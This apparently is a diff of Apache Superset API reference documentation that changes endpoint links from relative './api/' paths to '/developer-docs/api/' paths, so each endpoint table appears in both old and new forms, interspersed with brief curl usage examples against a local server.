| `POST` | [Create a copy of an existing dashboard](/developer-docs/api/create-a-copy-of-an-existing-dashboard) | `/api/v1/dashboard/{id_or_slug}/copy/` |
| `GET` | [Get dashboard's datasets](/developer-docs/api/get-dashboard-s-datasets) | `/api/v1/dashboard/{id_or_slug}/datasets` |
| `DELETE` | [Delete a dashboard's embedded configuration](/developer-docs/api/delete-a-dashboard-s-embedded-configuration) | `/api/v1/dashboard/{id_or_slug}/embedded` |
| `GET` | [Get the dashboard's embedded configuration](/developer-docs/api/get-the-dashboard-s-embedded-configuration) | `/api/v1/dashboard/{id_or_slug}/embedded` |
| `POST` | [Set a dashboard's embedded configuration](/developer-docs/api/set-a-dashboard-s-embedded-configuration) | `/api/v1/dashboard/{id_or_slug}/embedded` |
| `PUT` | [Update dashboard by id_or_slug embedded](/developer-docs/api/update-dashboard-by-id-or-slug-embedded) | `/api/v1/dashboard/{id_or_slug}/embedded` |
| `GET` | [Get dashboard's tabs](/developer-docs/api/get-dashboard-s-tabs) | `/api/v1/dashboard/{id_or_slug}/tabs` |
| `DELETE` | [Delete a dashboard](/developer-docs/api/delete-a-dashboard) | `/api/v1/dashboard/{pk}` |
| `PUT` | [Update a dashboard](/developer-docs/api/update-a-dashboard) | `/api/v1/dashboard/{pk}` |
| `POST` | [Compute and cache a screenshot (dashboard-pk-cache-dashboard-screenshot)](/developer-docs/api/compute-and-cache-a-screenshot-dashboard-pk-cache-dashboard-screenshot) | `/api/v1/dashboard/{pk}/cache_dashboard_screenshot/` |
| `PUT` | [Update colors configuration for a dashboard.](/developer-docs/api/update-colors-configuration-for-a-dashboard) | `/api/v1/dashboard/{pk}/colors` |
| `DELETE` | [Remove the dashboard from the user favorite list](/developer-docs/api/remove-the-dashboard-from-the-user-favorite-list) | `/api/v1/dashboard/{pk}/favorites/` |
| `POST` | [Mark the dashboard as favorite for the current user](/developer-docs/api/mark-the-dashboard-as-favorite-for-the-current-user) | `/api/v1/dashboard/{pk}/favorites/` |
| `PUT` | [Update native filters configuration for a dashboard.](/developer-docs/api/update-native-filters-configuration-for-a-dashboard) | `/api/v1/dashboard/{pk}/filters` |
| `GET` | [Get a computed screenshot from cache (dashboard-pk-screenshot-digest)](/developer-docs/api/get-a-computed-screenshot-from-cache-dashboard-pk-screenshot-digest) | `/api/v1/dashboard/{pk}/screenshot/{digest}/` |
| `GET` | [Get dashboard's thumbnail](/developer-docs/api/get-dashboard-s-thumbnail) | `/api/v1/dashboard/{pk}/thumbnail/{digest}/` |
| `GET` | [Download multiple dashboards as YAML files](/developer-docs/api/download-multiple-dashboards-as-yaml-files) | `/api/v1/dashboard/export/` |
| `GET` | [Check favorited dashboards for current user](/developer-docs/api/check-favorited-dashboards-for-current-user) | `/api/v1/dashboard/favorite_status/` |
| `POST` | [Import dashboard(s) with associated charts/datasets/databases](/developer-docs/api/import-dashboard-s-with-associated-charts-datasets-databases) | `/api/v1/dashboard/import/` |
| `GET` | [Get related fields data (dashboard-related-column-name)](/developer-docs/api/get-related-fields-data-dashboard-related-column-name) | `/api/v1/dashboard/related/{column_name}` |

</details>
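
As a quick orientation to the dashboard endpoints above, here is a minimal sketch of listing dashboards, assuming a local Superset at `http://localhost:8088` and a valid access token; list endpoints accept a Rison-encoded `q` parameter for sorting and pagination.

```bash
# List dashboards, newest first, 25 per page.
# The host, token, and q-parameter values are placeholders.
curl -G "http://localhost:8088/api/v1/dashboard/" \
  -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
  --data-urlencode "q=(order_column:changed_on_delta_humanized,order_direction:desc,page:0,page_size:25)"
```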
@@ -97,26 +97,26 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `DELETE` | [Bulk delete charts](./api/bulk-delete-charts) | `/api/v1/chart/` |
| `GET` | [Get a list of charts](./api/get-a-list-of-charts) | `/api/v1/chart/` |
| `POST` | [Create a new chart](./api/create-a-new-chart) | `/api/v1/chart/` |
| `GET` | [Get metadata information about this API resource (chart--info)](./api/get-metadata-information-about-this-api-resource-chart-info) | `/api/v1/chart/_info` |
| `DELETE` | [Delete a chart](./api/delete-a-chart) | `/api/v1/chart/{pk}` |
| `GET` | [Get a chart detail information](./api/get-a-chart-detail-information) | `/api/v1/chart/{pk}` |
| `PUT` | [Update a chart](./api/update-a-chart) | `/api/v1/chart/{pk}` |
| `GET` | [Compute and cache a screenshot (chart-pk-cache-screenshot)](./api/compute-and-cache-a-screenshot-chart-pk-cache-screenshot) | `/api/v1/chart/{pk}/cache_screenshot/` |
| `GET` | [Return payload data response for a chart](./api/return-payload-data-response-for-a-chart) | `/api/v1/chart/{pk}/data/` |
| `DELETE` | [Remove the chart from the user favorite list](./api/remove-the-chart-from-the-user-favorite-list) | `/api/v1/chart/{pk}/favorites/` |
| `POST` | [Mark the chart as favorite for the current user](./api/mark-the-chart-as-favorite-for-the-current-user) | `/api/v1/chart/{pk}/favorites/` |
| `GET` | [Get a computed screenshot from cache (chart-pk-screenshot-digest)](./api/get-a-computed-screenshot-from-cache-chart-pk-screenshot-digest) | `/api/v1/chart/{pk}/screenshot/{digest}/` |
| `GET` | [Get chart thumbnail](./api/get-chart-thumbnail) | `/api/v1/chart/{pk}/thumbnail/{digest}/` |
| `POST` | [Return payload data response for the given query (chart-data)](./api/return-payload-data-response-for-the-given-query-chart-data) | `/api/v1/chart/data` |
| `GET` | [Return payload data response for the given query (chart-data-cache-key)](./api/return-payload-data-response-for-the-given-query-chart-data-cache-key) | `/api/v1/chart/data/{cache_key}` |
| `GET` | [Download multiple charts as YAML files](./api/download-multiple-charts-as-yaml-files) | `/api/v1/chart/export/` |
| `GET` | [Check favorited charts for current user](./api/check-favorited-charts-for-current-user) | `/api/v1/chart/favorite_status/` |
| `POST` | [Import chart(s) with associated datasets and databases](./api/import-chart-s-with-associated-datasets-and-databases) | `/api/v1/chart/import/` |
| `GET` | [Get related fields data (chart-related-column-name)](./api/get-related-fields-data-chart-related-column-name) | `/api/v1/chart/related/{column_name}` |
| `PUT` | [Warm up the cache for the chart](./api/warm-up-the-cache-for-the-chart) | `/api/v1/chart/warm_up_cache` |
| `DELETE` | [Bulk delete charts](/developer-docs/api/bulk-delete-charts) | `/api/v1/chart/` |
| `GET` | [Get a list of charts](/developer-docs/api/get-a-list-of-charts) | `/api/v1/chart/` |
| `POST` | [Create a new chart](/developer-docs/api/create-a-new-chart) | `/api/v1/chart/` |
| `GET` | [Get metadata information about this API resource (chart--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-chart-info) | `/api/v1/chart/_info` |
| `DELETE` | [Delete a chart](/developer-docs/api/delete-a-chart) | `/api/v1/chart/{pk}` |
| `GET` | [Get a chart detail information](/developer-docs/api/get-a-chart-detail-information) | `/api/v1/chart/{pk}` |
| `PUT` | [Update a chart](/developer-docs/api/update-a-chart) | `/api/v1/chart/{pk}` |
| `GET` | [Compute and cache a screenshot (chart-pk-cache-screenshot)](/developer-docs/api/compute-and-cache-a-screenshot-chart-pk-cache-screenshot) | `/api/v1/chart/{pk}/cache_screenshot/` |
| `GET` | [Return payload data response for a chart](/developer-docs/api/return-payload-data-response-for-a-chart) | `/api/v1/chart/{pk}/data/` |
| `DELETE` | [Remove the chart from the user favorite list](/developer-docs/api/remove-the-chart-from-the-user-favorite-list) | `/api/v1/chart/{pk}/favorites/` |
| `POST` | [Mark the chart as favorite for the current user](/developer-docs/api/mark-the-chart-as-favorite-for-the-current-user) | `/api/v1/chart/{pk}/favorites/` |
| `GET` | [Get a computed screenshot from cache (chart-pk-screenshot-digest)](/developer-docs/api/get-a-computed-screenshot-from-cache-chart-pk-screenshot-digest) | `/api/v1/chart/{pk}/screenshot/{digest}/` |
| `GET` | [Get chart thumbnail](/developer-docs/api/get-chart-thumbnail) | `/api/v1/chart/{pk}/thumbnail/{digest}/` |
| `POST` | [Return payload data response for the given query (chart-data)](/developer-docs/api/return-payload-data-response-for-the-given-query-chart-data) | `/api/v1/chart/data` |
| `GET` | [Return payload data response for the given query (chart-data-cache-key)](/developer-docs/api/return-payload-data-response-for-the-given-query-chart-data-cache-key) | `/api/v1/chart/data/{cache_key}` |
| `GET` | [Download multiple charts as YAML files](/developer-docs/api/download-multiple-charts-as-yaml-files) | `/api/v1/chart/export/` |
| `GET` | [Check favorited charts for current user](/developer-docs/api/check-favorited-charts-for-current-user) | `/api/v1/chart/favorite_status/` |
| `POST` | [Import chart(s) with associated datasets and databases](/developer-docs/api/import-chart-s-with-associated-datasets-and-databases) | `/api/v1/chart/import/` |
| `GET` | [Get related fields data (chart-related-column-name)](/developer-docs/api/get-related-fields-data-chart-related-column-name) | `/api/v1/chart/related/{column_name}` |
| `PUT` | [Warm up the cache for the chart](/developer-docs/api/warm-up-the-cache-for-the-chart) | `/api/v1/chart/warm_up_cache` |

</details>
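
The `/api/v1/chart/data` endpoint accepts a query-context payload rather than a chart id, so it can run ad-hoc queries against any dataset you can read. A hedged sketch follows; the datasource id, column, and metric names are placeholders, and depending on configuration mutating requests may also require an `X-CSRFToken` header.

```bash
# Query dataset 1 through the chart data endpoint; the datasource id,
# column, and metric names below are placeholders for your own dataset.
curl -X POST "http://localhost:8088/api/v1/chart/data" \
  -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "datasource": {"id": 1, "type": "table"},
    "queries": [{"columns": ["name"], "metrics": ["count"], "row_limit": 10}],
    "result_format": "json",
    "result_type": "full"
  }'
```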
@@ -125,24 +125,24 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `DELETE` | [Bulk delete datasets](./api/bulk-delete-datasets) | `/api/v1/dataset/` |
| `GET` | [Get a list of datasets](./api/get-a-list-of-datasets) | `/api/v1/dataset/` |
| `POST` | [Create a new dataset](./api/create-a-new-dataset) | `/api/v1/dataset/` |
| `GET` | [Get metadata information about this API resource (dataset--info)](./api/get-metadata-information-about-this-api-resource-dataset-info) | `/api/v1/dataset/_info` |
| `DELETE` | [Delete a dataset](./api/delete-a-dataset) | `/api/v1/dataset/{pk}` |
| `GET` | [Get a dataset](./api/get-a-dataset) | `/api/v1/dataset/{pk}` |
| `PUT` | [Update a dataset](./api/update-a-dataset) | `/api/v1/dataset/{pk}` |
| `DELETE` | [Delete a dataset column](./api/delete-a-dataset-column) | `/api/v1/dataset/{pk}/column/{column_id}` |
| `DELETE` | [Delete a dataset metric](./api/delete-a-dataset-metric) | `/api/v1/dataset/{pk}/metric/{metric_id}` |
| `PUT` | [Refresh and update columns of a dataset](./api/refresh-and-update-columns-of-a-dataset) | `/api/v1/dataset/{pk}/refresh` |
| `GET` | [Get charts and dashboards count associated to a dataset](./api/get-charts-and-dashboards-count-associated-to-a-dataset) | `/api/v1/dataset/{pk}/related_objects` |
| `GET` | [Get distinct values from field data (dataset-distinct-column-name)](./api/get-distinct-values-from-field-data-dataset-distinct-column-name) | `/api/v1/dataset/distinct/{column_name}` |
| `POST` | [Duplicate a dataset](./api/duplicate-a-dataset) | `/api/v1/dataset/duplicate` |
| `GET` | [Download multiple datasets as YAML files](./api/download-multiple-datasets-as-yaml-files) | `/api/v1/dataset/export/` |
| `POST` | [Retrieve a table by name, or create it if it does not exist](./api/retrieve-a-table-by-name-or-create-it-if-it-does-not-exist) | `/api/v1/dataset/get_or_create/` |
| `POST` | [Import dataset(s) with associated databases](./api/import-dataset-s-with-associated-databases) | `/api/v1/dataset/import/` |
| `GET` | [Get related fields data (dataset-related-column-name)](./api/get-related-fields-data-dataset-related-column-name) | `/api/v1/dataset/related/{column_name}` |
| `PUT` | [Warm up the cache for each chart powered by the given table](./api/warm-up-the-cache-for-each-chart-powered-by-the-given-table) | `/api/v1/dataset/warm_up_cache` |
| `DELETE` | [Bulk delete datasets](/developer-docs/api/bulk-delete-datasets) | `/api/v1/dataset/` |
| `GET` | [Get a list of datasets](/developer-docs/api/get-a-list-of-datasets) | `/api/v1/dataset/` |
| `POST` | [Create a new dataset](/developer-docs/api/create-a-new-dataset) | `/api/v1/dataset/` |
| `GET` | [Get metadata information about this API resource (dataset--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-dataset-info) | `/api/v1/dataset/_info` |
| `DELETE` | [Delete a dataset](/developer-docs/api/delete-a-dataset) | `/api/v1/dataset/{pk}` |
| `GET` | [Get a dataset](/developer-docs/api/get-a-dataset) | `/api/v1/dataset/{pk}` |
| `PUT` | [Update a dataset](/developer-docs/api/update-a-dataset) | `/api/v1/dataset/{pk}` |
| `DELETE` | [Delete a dataset column](/developer-docs/api/delete-a-dataset-column) | `/api/v1/dataset/{pk}/column/{column_id}` |
| `DELETE` | [Delete a dataset metric](/developer-docs/api/delete-a-dataset-metric) | `/api/v1/dataset/{pk}/metric/{metric_id}` |
| `PUT` | [Refresh and update columns of a dataset](/developer-docs/api/refresh-and-update-columns-of-a-dataset) | `/api/v1/dataset/{pk}/refresh` |
| `GET` | [Get charts and dashboards count associated to a dataset](/developer-docs/api/get-charts-and-dashboards-count-associated-to-a-dataset) | `/api/v1/dataset/{pk}/related_objects` |
| `GET` | [Get distinct values from field data (dataset-distinct-column-name)](/developer-docs/api/get-distinct-values-from-field-data-dataset-distinct-column-name) | `/api/v1/dataset/distinct/{column_name}` |
| `POST` | [Duplicate a dataset](/developer-docs/api/duplicate-a-dataset) | `/api/v1/dataset/duplicate` |
| `GET` | [Download multiple datasets as YAML files](/developer-docs/api/download-multiple-datasets-as-yaml-files) | `/api/v1/dataset/export/` |
| `POST` | [Retrieve a table by name, or create it if it does not exist](/developer-docs/api/retrieve-a-table-by-name-or-create-it-if-it-does-not-exist) | `/api/v1/dataset/get_or_create/` |
| `POST` | [Import dataset(s) with associated databases](/developer-docs/api/import-dataset-s-with-associated-databases) | `/api/v1/dataset/import/` |
| `GET` | [Get related fields data (dataset-related-column-name)](/developer-docs/api/get-related-fields-data-dataset-related-column-name) | `/api/v1/dataset/related/{column_name}` |
| `PUT` | [Warm up the cache for each chart powered by the given table](/developer-docs/api/warm-up-the-cache-for-each-chart-powered-by-the-given-table) | `/api/v1/dataset/warm_up_cache` |

</details>
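
Creating a dataset is a single POST that points Superset at an existing table. A minimal sketch; the database id, schema, and table name are placeholders:

```bash
# Register a physical table as a new dataset.
curl -X POST "http://localhost:8088/api/v1/dataset/" \
  -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"database": 1, "schema": "public", "table_name": "my_table"}'
```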
@@ -151,37 +151,37 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `GET` | [Get a list of databases](./api/get-a-list-of-databases) | `/api/v1/database/` |
| `POST` | [Create a new database](./api/create-a-new-database) | `/api/v1/database/` |
| `GET` | [Get metadata information about this API resource (database--info)](./api/get-metadata-information-about-this-api-resource-database-info) | `/api/v1/database/_info` |
| `DELETE` | [Delete a database](./api/delete-a-database) | `/api/v1/database/{pk}` |
| `GET` | [Get a database](./api/get-a-database) | `/api/v1/database/{pk}` |
| `PUT` | [Change a database](./api/change-a-database) | `/api/v1/database/{pk}` |
| `GET` | [Get all catalogs from a database](./api/get-all-catalogs-from-a-database) | `/api/v1/database/{pk}/catalogs/` |
| `GET` | [Get a database connection info](./api/get-a-database-connection-info) | `/api/v1/database/{pk}/connection` |
| `GET` | [Get function names supported by a database](./api/get-function-names-supported-by-a-database) | `/api/v1/database/{pk}/function_names/` |
| `GET` | [Get charts and dashboards count associated to a database](./api/get-charts-and-dashboards-count-associated-to-a-database) | `/api/v1/database/{pk}/related_objects/` |
| `GET` | [The list of the database schemas where to upload information](./api/the-list-of-the-database-schemas-where-to-upload-information) | `/api/v1/database/{pk}/schemas_access_for_file_upload/` |
| `GET` | [Get all schemas from a database](./api/get-all-schemas-from-a-database) | `/api/v1/database/{pk}/schemas/` |
| `GET` | [Get database select star for table (database-pk-select-star-table-name)](./api/get-database-select-star-for-table-database-pk-select-star-table-name) | `/api/v1/database/{pk}/select_star/{table_name}/` |
| `GET` | [Get database select star for table (database-pk-select-star-table-name-schema-name)](./api/get-database-select-star-for-table-database-pk-select-star-table-name-schema-name) | `/api/v1/database/{pk}/select_star/{table_name}/{schema_name}/` |
| `DELETE` | [Delete a SSH tunnel](./api/delete-a-ssh-tunnel) | `/api/v1/database/{pk}/ssh_tunnel/` |
| `POST` | [Re-sync all permissions for a database connection](./api/re-sync-all-permissions-for-a-database-connection) | `/api/v1/database/{pk}/sync_permissions/` |
| `GET` | [Get table extra metadata (database-pk-table-extra-table-name-schema-name)](./api/get-table-extra-metadata-database-pk-table-extra-table-name-schema-name) | `/api/v1/database/{pk}/table_extra/{table_name}/{schema_name}/` |
| `GET` | [Get table metadata](./api/get-table-metadata) | `/api/v1/database/{pk}/table_metadata/` |
| `GET` | [Get table extra metadata (database-pk-table-metadata-extra)](./api/get-table-extra-metadata-database-pk-table-metadata-extra) | `/api/v1/database/{pk}/table_metadata/extra/` |
| `GET` | [Get database table metadata](./api/get-database-table-metadata) | `/api/v1/database/{pk}/table/{table_name}/{schema_name}/` |
| `GET` | [Get a list of tables for given database](./api/get-a-list-of-tables-for-given-database) | `/api/v1/database/{pk}/tables/` |
| `POST` | [Upload a file to a database table](./api/upload-a-file-to-a-database-table) | `/api/v1/database/{pk}/upload/` |
| `POST` | [Validate arbitrary SQL](./api/validate-arbitrary-sql) | `/api/v1/database/{pk}/validate_sql/` |
| `GET` | [Get names of databases currently available](./api/get-names-of-databases-currently-available) | `/api/v1/database/available/` |
| `GET` | [Download database(s) and associated dataset(s) as a zip file](./api/download-database-s-and-associated-dataset-s-as-a-zip-file) | `/api/v1/database/export/` |
| `POST` | [Import database(s) with associated datasets](./api/import-database-s-with-associated-datasets) | `/api/v1/database/import/` |
| `GET` | [Receive personal access tokens from OAuth2](./api/receive-personal-access-tokens-from-oauth2) | `/api/v1/database/oauth2/` |
| `GET` | [Get related fields data (database-related-column-name)](./api/get-related-fields-data-database-related-column-name) | `/api/v1/database/related/{column_name}` |
| `POST` | [Test a database connection](./api/test-a-database-connection) | `/api/v1/database/test_connection/` |
| `POST` | [Upload a file and returns file metadata](./api/upload-a-file-and-returns-file-metadata) | `/api/v1/database/upload_metadata/` |
| `POST` | [Validate database connection parameters](./api/validate-database-connection-parameters) | `/api/v1/database/validate_parameters/` |
| `GET` | [Get a list of databases](/developer-docs/api/get-a-list-of-databases) | `/api/v1/database/` |
| `POST` | [Create a new database](/developer-docs/api/create-a-new-database) | `/api/v1/database/` |
| `GET` | [Get metadata information about this API resource (database--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-database-info) | `/api/v1/database/_info` |
| `DELETE` | [Delete a database](/developer-docs/api/delete-a-database) | `/api/v1/database/{pk}` |
| `GET` | [Get a database](/developer-docs/api/get-a-database) | `/api/v1/database/{pk}` |
| `PUT` | [Change a database](/developer-docs/api/change-a-database) | `/api/v1/database/{pk}` |
| `GET` | [Get all catalogs from a database](/developer-docs/api/get-all-catalogs-from-a-database) | `/api/v1/database/{pk}/catalogs/` |
| `GET` | [Get a database connection info](/developer-docs/api/get-a-database-connection-info) | `/api/v1/database/{pk}/connection` |
| `GET` | [Get function names supported by a database](/developer-docs/api/get-function-names-supported-by-a-database) | `/api/v1/database/{pk}/function_names/` |
| `GET` | [Get charts and dashboards count associated to a database](/developer-docs/api/get-charts-and-dashboards-count-associated-to-a-database) | `/api/v1/database/{pk}/related_objects/` |
| `GET` | [The list of the database schemas where to upload information](/developer-docs/api/the-list-of-the-database-schemas-where-to-upload-information) | `/api/v1/database/{pk}/schemas_access_for_file_upload/` |
| `GET` | [Get all schemas from a database](/developer-docs/api/get-all-schemas-from-a-database) | `/api/v1/database/{pk}/schemas/` |
| `GET` | [Get database select star for table (database-pk-select-star-table-name)](/developer-docs/api/get-database-select-star-for-table-database-pk-select-star-table-name) | `/api/v1/database/{pk}/select_star/{table_name}/` |
| `GET` | [Get database select star for table (database-pk-select-star-table-name-schema-name)](/developer-docs/api/get-database-select-star-for-table-database-pk-select-star-table-name-schema-name) | `/api/v1/database/{pk}/select_star/{table_name}/{schema_name}/` |
| `DELETE` | [Delete a SSH tunnel](/developer-docs/api/delete-a-ssh-tunnel) | `/api/v1/database/{pk}/ssh_tunnel/` |
| `POST` | [Re-sync all permissions for a database connection](/developer-docs/api/re-sync-all-permissions-for-a-database-connection) | `/api/v1/database/{pk}/sync_permissions/` |
| `GET` | [Get table extra metadata (database-pk-table-extra-table-name-schema-name)](/developer-docs/api/get-table-extra-metadata-database-pk-table-extra-table-name-schema-name) | `/api/v1/database/{pk}/table_extra/{table_name}/{schema_name}/` |
| `GET` | [Get table metadata](/developer-docs/api/get-table-metadata) | `/api/v1/database/{pk}/table_metadata/` |
| `GET` | [Get table extra metadata (database-pk-table-metadata-extra)](/developer-docs/api/get-table-extra-metadata-database-pk-table-metadata-extra) | `/api/v1/database/{pk}/table_metadata/extra/` |
| `GET` | [Get database table metadata](/developer-docs/api/get-database-table-metadata) | `/api/v1/database/{pk}/table/{table_name}/{schema_name}/` |
| `GET` | [Get a list of tables for given database](/developer-docs/api/get-a-list-of-tables-for-given-database) | `/api/v1/database/{pk}/tables/` |
| `POST` | [Upload a file to a database table](/developer-docs/api/upload-a-file-to-a-database-table) | `/api/v1/database/{pk}/upload/` |
| `POST` | [Validate arbitrary SQL](/developer-docs/api/validate-arbitrary-sql) | `/api/v1/database/{pk}/validate_sql/` |
| `GET` | [Get names of databases currently available](/developer-docs/api/get-names-of-databases-currently-available) | `/api/v1/database/available/` |
| `GET` | [Download database(s) and associated dataset(s) as a zip file](/developer-docs/api/download-database-s-and-associated-dataset-s-as-a-zip-file) | `/api/v1/database/export/` |
| `POST` | [Import database(s) with associated datasets](/developer-docs/api/import-database-s-with-associated-datasets) | `/api/v1/database/import/` |
| `GET` | [Receive personal access tokens from OAuth2](/developer-docs/api/receive-personal-access-tokens-from-oauth2) | `/api/v1/database/oauth2/` |
| `GET` | [Get related fields data (database-related-column-name)](/developer-docs/api/get-related-fields-data-database-related-column-name) | `/api/v1/database/related/{column_name}` |
| `POST` | [Test a database connection](/developer-docs/api/test-a-database-connection) | `/api/v1/database/test_connection/` |
| `POST` | [Upload a file and returns file metadata](/developer-docs/api/upload-a-file-and-returns-file-metadata) | `/api/v1/database/upload_metadata/` |
| `POST` | [Validate database connection parameters](/developer-docs/api/validate-database-connection-parameters) | `/api/v1/database/validate_parameters/` |

</details>
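
Before persisting a connection, `/api/v1/database/test_connection/` lets you verify credentials. A sketch under assumed payload fields; the SQLAlchemy URI and name are placeholders, so check the linked test-a-database-connection page for the exact schema:

```bash
# Dry-run a connection without saving it.
# The payload field names are assumptions; URI and name are placeholders.
curl -X POST "http://localhost:8088/api/v1/database/test_connection/" \
  -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"database_name": "examples", "sqlalchemy_uri": "postgresql://user:pass@host:5432/db"}'
```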
@@ -192,7 +192,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `GET` | [Assemble Explore related information in a single endpoint](./api/assemble-explore-related-information-in-a-single-endpoint) | `/api/v1/explore/` |
| `GET` | [Assemble Explore related information in a single endpoint](/developer-docs/api/assemble-explore-related-information-in-a-single-endpoint) | `/api/v1/explore/` |

</details>
@@ -201,12 +201,12 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `GET` | [Get the bootstrap data for SqlLab page](./api/get-the-bootstrap-data-for-sqllab-page) | `/api/v1/sqllab/` |
| `POST` | [Estimate the SQL query execution cost](./api/estimate-the-sql-query-execution-cost) | `/api/v1/sqllab/estimate/` |
| `POST` | [Execute a SQL query](./api/execute-a-sql-query) | `/api/v1/sqllab/execute/` |
| `GET` | [Export the SQL query results to a CSV](./api/export-the-sql-query-results-to-a-csv) | `/api/v1/sqllab/export/{client_id}/` |
| `POST` | [Format SQL code](./api/format-sql-code) | `/api/v1/sqllab/format_sql/` |
| `GET` | [Get the result of a SQL query execution](./api/get-the-result-of-a-sql-query-execution) | `/api/v1/sqllab/results/` |
| `GET` | [Get the bootstrap data for SqlLab page](/developer-docs/api/get-the-bootstrap-data-for-sqllab-page) | `/api/v1/sqllab/` |
| `POST` | [Estimate the SQL query execution cost](/developer-docs/api/estimate-the-sql-query-execution-cost) | `/api/v1/sqllab/estimate/` |
| `POST` | [Execute a SQL query](/developer-docs/api/execute-a-sql-query) | `/api/v1/sqllab/execute/` |
| `GET` | [Export the SQL query results to a CSV](/developer-docs/api/export-the-sql-query-results-to-a-csv) | `/api/v1/sqllab/export/{client_id}/` |
| `POST` | [Format SQL code](/developer-docs/api/format-sql-code) | `/api/v1/sqllab/format_sql/` |
| `GET` | [Get the result of a SQL query execution](/developer-docs/api/get-the-result-of-a-sql-query-execution) | `/api/v1/sqllab/results/` |

</details>
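
The SQL Lab execute endpoint runs a statement against a configured database and returns the result set inline (or a handle to poll when run asynchronously). A minimal sketch; the database id and SQL are placeholders:

```bash
# Execute a one-off statement through SQL Lab.
curl -X POST "http://localhost:8088/api/v1/sqllab/execute/" \
  -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"database_id": 1, "sql": "SELECT 1 AS ok"}'
```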
@@ -215,23 +215,23 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `GET` | [Get a list of queries](./api/get-a-list-of-queries) | `/api/v1/query/` |
| `GET` | [Get query detail information](./api/get-query-detail-information) | `/api/v1/query/{pk}` |
| `GET` | [Get distinct values from field data (query-distinct-column-name)](./api/get-distinct-values-from-field-data-query-distinct-column-name) | `/api/v1/query/distinct/{column_name}` |
| `GET` | [Get related fields data (query-related-column-name)](./api/get-related-fields-data-query-related-column-name) | `/api/v1/query/related/{column_name}` |
| `POST` | [Manually stop a query with client_id](./api/manually-stop-a-query-with-client-id) | `/api/v1/query/stop` |
| `GET` | [Get a list of queries that changed after last_updated_ms](./api/get-a-list-of-queries-that-changed-after-last-updated-ms) | `/api/v1/query/updated_since` |
| `DELETE` | [Bulk delete saved queries](./api/bulk-delete-saved-queries) | `/api/v1/saved_query/` |
| `GET` | [Get a list of saved queries](./api/get-a-list-of-saved-queries) | `/api/v1/saved_query/` |
| `POST` | [Create a saved query](./api/create-a-saved-query) | `/api/v1/saved_query/` |
| `GET` | [Get metadata information about this API resource (saved-query--info)](./api/get-metadata-information-about-this-api-resource-saved-query-info) | `/api/v1/saved_query/_info` |
| `DELETE` | [Delete a saved query](./api/delete-a-saved-query) | `/api/v1/saved_query/{pk}` |
| `GET` | [Get a saved query](./api/get-a-saved-query) | `/api/v1/saved_query/{pk}` |
| `PUT` | [Update a saved query](./api/update-a-saved-query) | `/api/v1/saved_query/{pk}` |
| `GET` | [Get distinct values from field data (saved-query-distinct-column-name)](./api/get-distinct-values-from-field-data-saved-query-distinct-column-name) | `/api/v1/saved_query/distinct/{column_name}` |
| `GET` | [Download multiple saved queries as YAML files](./api/download-multiple-saved-queries-as-yaml-files) | `/api/v1/saved_query/export/` |
| `POST` | [Import saved queries with associated databases](./api/import-saved-queries-with-associated-databases) | `/api/v1/saved_query/import/` |
| `GET` | [Get related fields data (saved-query-related-column-name)](./api/get-related-fields-data-saved-query-related-column-name) | `/api/v1/saved_query/related/{column_name}` |
| `GET` | [Get a list of queries](/developer-docs/api/get-a-list-of-queries) | `/api/v1/query/` |
| `GET` | [Get query detail information](/developer-docs/api/get-query-detail-information) | `/api/v1/query/{pk}` |
| `GET` | [Get distinct values from field data (query-distinct-column-name)](/developer-docs/api/get-distinct-values-from-field-data-query-distinct-column-name) | `/api/v1/query/distinct/{column_name}` |
| `GET` | [Get related fields data (query-related-column-name)](/developer-docs/api/get-related-fields-data-query-related-column-name) | `/api/v1/query/related/{column_name}` |
| `POST` | [Manually stop a query with client_id](/developer-docs/api/manually-stop-a-query-with-client-id) | `/api/v1/query/stop` |
| `GET` | [Get a list of queries that changed after last_updated_ms](/developer-docs/api/get-a-list-of-queries-that-changed-after-last-updated-ms) | `/api/v1/query/updated_since` |
| `DELETE` | [Bulk delete saved queries](/developer-docs/api/bulk-delete-saved-queries) | `/api/v1/saved_query/` |
| `GET` | [Get a list of saved queries](/developer-docs/api/get-a-list-of-saved-queries) | `/api/v1/saved_query/` |
| `POST` | [Create a saved query](/developer-docs/api/create-a-saved-query) | `/api/v1/saved_query/` |
| `GET` | [Get metadata information about this API resource (saved-query--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-saved-query-info) | `/api/v1/saved_query/_info` |
| `DELETE` | [Delete a saved query](/developer-docs/api/delete-a-saved-query) | `/api/v1/saved_query/{pk}` |
| `GET` | [Get a saved query](/developer-docs/api/get-a-saved-query) | `/api/v1/saved_query/{pk}` |
| `PUT` | [Update a saved query](/developer-docs/api/update-a-saved-query) | `/api/v1/saved_query/{pk}` |
| `GET` | [Get distinct values from field data (saved-query-distinct-column-name)](/developer-docs/api/get-distinct-values-from-field-data-saved-query-distinct-column-name) | `/api/v1/saved_query/distinct/{column_name}` |
| `GET` | [Download multiple saved queries as YAML files](/developer-docs/api/download-multiple-saved-queries-as-yaml-files) | `/api/v1/saved_query/export/` |
| `POST` | [Import saved queries with associated databases](/developer-docs/api/import-saved-queries-with-associated-databases) | `/api/v1/saved_query/import/` |
| `GET` | [Get related fields data (saved-query-related-column-name)](/developer-docs/api/get-related-fields-data-saved-query-related-column-name) | `/api/v1/saved_query/related/{column_name}` |

</details>
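
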